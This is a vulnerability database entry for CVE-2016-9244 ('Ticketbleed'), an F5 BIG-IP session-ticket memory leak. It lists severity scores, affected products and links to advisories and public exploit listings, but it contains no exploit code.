Public exploit available
Public proof-of-concept or exploit code exists (ExploitDB / Metasploit / Nuclei).

CVE-2016-9244

CWE-200Information Exposure8 documents6 sources
Severity
7.5HIGH
EPSS
67.5%
top 1.43%
CISA KEV
Not in KEV
Exploit
PoC available
Public exploit / PoC exists
Affected products
10
F5 Big-ip Access Policy ManagerF5 Big-ip Advanced Firewall ManagerF5 Big-ip Analytics+7 more
Timeline
PublishedFeb 9
Latest updateMay 14

Description

A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NExploitability: 3.9 | Impact: 3.6

Affected Packages10 packages

NVDf5/big-ip_analytics13 versions+12
NVDf5/big-ip_link_controller13 versions+12

🔴Vulnerability Details

2
GHSA
GHSA-5855-8rvh-x38f: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninit2022-05-14
CVEList
CVE-2016-9244: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninit2017-02-09

💥Exploits & PoCs

2
Exploit-DB
F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure2017-02-14
Exploit-DB
F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure2017-02-10

📋Vendor Advisories

1
F5
CVE-2016-9244: A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled ...2017-02-09

🕵️Threat Intelligence

2
Talos
Cisco Coverage for 'Ticketbleed'2017-02-10
Talos
Cisco Coverage for 'Ticketbleed'2017-02-10
CVE-2016-9244 (HIGH CVSS 7.5) | A BIG-IP virtual server configured | cvebase.io